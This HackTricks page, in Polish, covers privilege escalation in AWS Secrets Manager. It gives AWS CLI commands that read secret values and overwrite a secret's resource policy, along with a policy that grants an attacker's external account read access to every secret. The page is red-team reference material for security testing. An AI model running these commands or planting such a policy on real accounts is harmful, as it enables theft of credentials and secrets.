AWS - Secrets Manager Privesc

Dowiedz się, jak hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks:

Secrets Manager

Aby uzyskać więcej informacji na temat menedżera sekretów, sprawdź:

pageAWS - Secrets Manager Enum

secretsmanager:GetSecretValue

Atakujący posiadający te uprawnienia może uzyskać zapisaną wartość wewnątrz sekretu w AWS Secrets Manager.

aws secretsmanager get-secret-value --secret-id <secret_name> # Get value

Potencjalne skutki: Dostęp do wysoko poufnych danych w usłudze AWS Secrets Manager.

secretsmanager:GetResourcePolicy, secretsmanager:PutResourcePolicy, (secretsmanager:ListSecrets)

Z powyższymi uprawnieniami możliwe jest udzielenie dostępu innym podmiotom/kontom (nawet zewnętrznym) do tajemnicy. Należy jednak zauważyć, że w celu odczytania zaszyfrowanych tajemnic za pomocą klucza KMS, użytkownik musi również mieć dostęp do klucza KMS (więcej informacji na stronie KMS Enum).

aws secretsmanager list-secrets
aws secretsmanager get-resource-policy --secret-id <secret_name>
aws secretsmanager put-resource-policy --secret-id <secret_name> --resource-policy file:///tmp/policy.json

policy.json:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "AllowListSecrets",
            "Effect": "Allow",
            "Action": [
                "secretsmanager:ListSecrets"
            ],
            "Resource": "*"
        },
        {
            "Sid": "AllowGetSecretValue",
            "Effect": "Allow",
            "Action": [
                "secretsmanager:GetSecretValue"
            ],
            "Resource": "arn:aws:secretsmanager:us-east-1:123456789012:secret:MySecret"
        }
    ]
}

This policy allows the user to list all secrets in the Secrets Manager and get the value of a specific secret named "MySecret". The user is granted the secretsmanager:ListSecrets and secretsmanager:GetSecretValue actions. The Resource field specifies the ARN (Amazon Resource Name) of the secret that the user is allowed to access.

{
"Version" : "2012-10-17",
"Statement" : [ {
"Effect" : "Allow",
"Principal" : {
"AWS" : "arn:aws:iam::<attackers_account>:root"
},
"Action" : "secretsmanager:GetSecretValue",
"Resource" : "*"
} ]
}
Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks:

Last updated